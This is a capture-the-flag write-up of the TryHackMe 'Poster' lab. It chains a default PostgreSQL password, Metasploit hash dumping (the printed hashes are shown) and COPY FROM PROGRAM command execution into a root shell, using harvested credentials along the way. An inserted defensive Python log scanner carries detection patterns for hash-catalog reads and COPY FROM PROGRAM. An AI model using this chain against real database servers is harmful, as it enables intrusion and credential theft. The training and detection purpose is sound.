Tryhackme
Poster is an easy-category room developed by stuxnet. It shows how a misconfigured RDBMS can lead to a full system compromise. You can check out the room here.
Let's start with a quick nmap scan.
Initial Nmap scan
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
|   256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_  256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open  postgresql PostgreSQL DB 9.5.8 - 9.5.10
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after:  2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we have SSH, a web server and postgres. Checking the web server, it is just a simple home page, nothing interesting. So, let's go with postgres. As the room directs us, we can use a number of Metasploit modules to enumerate and exploit postgres. First, we check whether the postgres server still has a default password set, using the module auxiliary/scanner/postgres/postgres_login.
10.10.253.187:5432 - Login Successful: postgres:password@template1
We get a match!
Now, to execute arbitrary SQL commands on the server, we can use the module auxiliary/admin/postgres/postgres_sql. Using the command select version(), we can get the RDBMS version.
We can also dump the postgres users' password hashes with another Metasploit module, auxiliary/scanner/postgres/postgres_hashdump.
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc
Now, to achieve RCE, we will use the module
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
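From the defender's side, every step of this Postgres chain (password guessing against the postgres account, the catalog read behind the hash dump, and the COPY FROM PROGRAM command execution that the module above relies on, which needs superuser in 9.5) shows up in the server log once log_connections and log_statement are turned on. The following Python scanner is an added example, not code from the room or the writeup; the log lines are constructed, and the prefix format it parses assumes log_line_prefix = '%m [%p] %u@%d %h ' in postgresql.conf.

```python
import re
from collections import Counter

# Constructed sample log (not from the room); assumes postgresql.conf has
# log_connections = on, log_statement = 'all', log_line_prefix = '%m [%p] %u@%d %h '.
SAMPLE_LOG = """\
2020-07-29 00:54:25 UTC [2231] postgres@template1 10.10.14.5 FATAL:  password authentication failed for user "postgres"
2020-07-29 00:54:26 UTC [2232] postgres@template1 10.10.14.5 FATAL:  password authentication failed for user "postgres"
2020-07-29 00:54:27 UTC [2233] postgres@template1 10.10.14.5 FATAL:  password authentication failed for user "postgres"
2020-07-29 00:54:28 UTC [2234] postgres@template1 10.10.14.5 LOG:  connection authorized: user=postgres database=template1
2020-07-29 00:55:01 UTC [2234] postgres@template1 10.10.14.5 LOG:  statement: select version()
2020-07-29 00:55:30 UTC [2234] postgres@template1 10.10.14.5 LOG:  statement: select usename, passwd from pg_shadow
2020-07-29 00:56:10 UTC [2234] postgres@template1 10.10.14.5 LOG:  statement: COPY cmd_output FROM PROGRAM 'id'
2020-07-29 01:00:00 UTC [2300] alison@poster 127.0.0.1 LOG:  statement: select title from posts
"""
LOCAL_HOSTS = {"127.0.0.1", "::1", "[local]"}

# One line of the assumed prefix format: timestamp [pid] user@db host LEVEL:  message
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) "
    r"(?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# Statement patterns worth an alert: reads of the password-hash catalogs, and
# COPY FROM PROGRAM, which runs an OS command as the server's unix user.
STATEMENT_RULES = [
    ("hash-dump query", re.compile(r"statement:.*\bpg_(shadow|authid)\b", re.I)),
    ("os-command via COPY FROM PROGRAM", re.compile(r"statement:.*\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)),
]

def scan_postgres_log(text, fail_threshold=3):
    """Return (timestamp, client_host, finding) tuples for suspicious events, in log order."""
    findings = []
    failures = Counter()  # failed password attempts per client host
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, host, msg = m.group("ts", "user", "host", "msg")
        if "password authentication failed" in msg:
            failures[host] += 1
            if failures[host] == fail_threshold:  # alert once per host
                findings.append((ts, host, f"{fail_threshold} failed logins (possible password guessing)"))
        elif msg.startswith("connection authorized:") and user == "postgres" and host not in LOCAL_HOSTS:
            findings.append((ts, host, "remote login as superuser 'postgres'"))
        else:
            for name, rx in STATEMENT_RULES:
                if rx.search(msg):
                    findings.append((ts, host, name))
    return findings
```

The local login by alison produces no finding; the remaining fixes are configuration, not detection: a non-default password for postgres, pg_hba.conf entries that do not expose the superuser to the network, and an application role without superuser so COPY FROM PROGRAM is refused.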
Running the exploit module, we get a shell. Running id confirms that we are the user postgres. Now, I tried to spawn a TTY but couldn't find python, php or anything useful, so I decided to enumerate the system. In the directory /home/dark, we see something juicy.
ls -la /home/dark
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28 20:33 .
drwxr-xr-x 4 root root 4096 Jul 28 20:13 ..
-rw------- 1 dark dark   26 Jul 28 20:33 .bash_history
-rw-r--r-- 1 dark dark  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31  2015 .bashrc
-rwxrwxrwx 1 dark dark   24 Jul 28 20:15 credentials.txt
-rw-r--r-- 1 dark dark  655 May 16  2017 .profile
This gives us the credentials for the user dark. Since SSH is open, I logged in to the system as dark. Upon further enumeration, we find a file users.txt in /home/alison, but it is only accessible by the user alison. I tried some low-hanging fruit like sudo -l and SUID binaries but couldn't find anything, so I decided on more ENUMERATION.
In /var/www/html, we see a config.php:
<?php

 $dbhost = "127.0.0.1";
 $dbuname = "alison";
 $dbpass = <the password was stored here>;
 $dbname = "mysudopassword";
So now we have alison's password, and we can read users.txt and get our user flag.
Running sudo -l, we see the all-time favourite, ALL:ALL, so we switch to root and have our root flag!
Hope you learned something new. Thanks for reading and, as always,
See ya later!